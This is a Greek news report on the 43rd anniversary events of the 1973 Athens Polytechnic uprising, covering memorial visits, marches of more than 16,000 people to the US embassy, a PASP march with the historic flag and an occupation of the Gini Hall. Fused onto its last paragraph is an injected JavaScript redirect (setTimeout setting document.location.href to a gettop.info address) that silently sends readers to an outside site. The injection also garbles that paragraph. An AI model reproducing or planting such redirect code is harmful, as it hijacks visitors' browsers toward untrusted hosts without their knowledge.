Κορυφώνονται οι εκδηλώσεις για το Πολυτεχνείο

0
3

 

Με την μεγάλη πορεία προς την Αμερικανική πρεσβεία κορυφώνονται οι εκδηλώσεις για το Πολυτεχνείο.

Από το πρωί πλήθος κόσμου αλλά και εκπρόσωποι φορέων επισκέφθηκαν τον ιστορικό χώρο του Πολυτεχνείου για να αποτίσουν τον δικό τους φόρο τιμής στην εξέγερση των φοιτητών κατά της δικτατορίας, σαν σήμερα, πριν από 43 χρόνια. Οικογένειες με τα παιδιά τους, ηλικιωμένοι με τις δικές τους μνήμες, νέοι άνθρωποι έδωσαν το «παρών» αφήνοντας γαρύφαλλα στο μνημείο του Πολυτεχνείου και στην πύλη που είχε ρίξει το τανκ τα ξημερώματα της 17ης Νοεμβρίου του 1973.

Ήδη οι πρώτοι διαδηλωτές έχουν φτάσει στην αμερικανική πρεσβεία, που είναι φραγμένη περιμετρικά από δεκάδες κλούβες των ΜΑΤ.

1479394718685244

Ξεχωριστή πορεία πραγματοποίησαν τα μέλη της ΠΑΣΠ που έχουν στην κατοχή τους την αιματοβαμμένη σημαία του Πολυτεχνείου μετά τη διάλυση της ΕΦΕΕ.
Τα μέλη της ΠΑΣΠ έκαναν προσυγκέντρωση στην οδό Ακαδημίας και Ιπποκράτους και στη συνέχεια κατευθύνθηκαν προς την Πατησίων και το κτίριο του Πολυτεχνείου όπου από εκεί ξεδίπλωσαν τη σημαία και ξεκίνησαν την πορεία τους προς την αμερικανική πρεσβεία.

Οι διαδηλωτές φωνάζοντας συνθήματα όπως «Ζει, ζει ο Τεμπονέρας ζει, με Πέτρουλα, Λαμπράκη μας οδηγηθεί» και «Το Πολυτεχνείο δεν ήταν γιορτή, ήταν εξέγερση και πάλη λαϊκή» κατευθύνθηκαν μέσω της οδού Ακαδημίας προς την πρεσβεία των ΗΠΑ όπου και διαλύθηκαν.

Αυτή την ώρα οι περισσότεροι από 16.000 διαδηλωτές στις δύο παράλληλες πορείες κατευθύνονται μέσα από τους κεντρικούς δρόμους της Αθήνας στην αμερικανική πρεσβεία.

Στο μεταξύ στην Αίθουσα Γκίνη του Πολυτεχνείου παραμένουν νεαροί οι οποίοι σύμφωνα με πληροφορίες εκματαλλεύτηκαν την άδεια που τους έδωσε ο πρύτανης για να κάνουν δήθεν εκδήλωση στην Αίθουσα και εκείνοι προχώρησαν σε κατάληψή της. προβληματίζει την ΕΛ.ΑΣ, καθώς το Πολυτεχνείο μετατρέπεται συχνά σε «ορμητήριο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here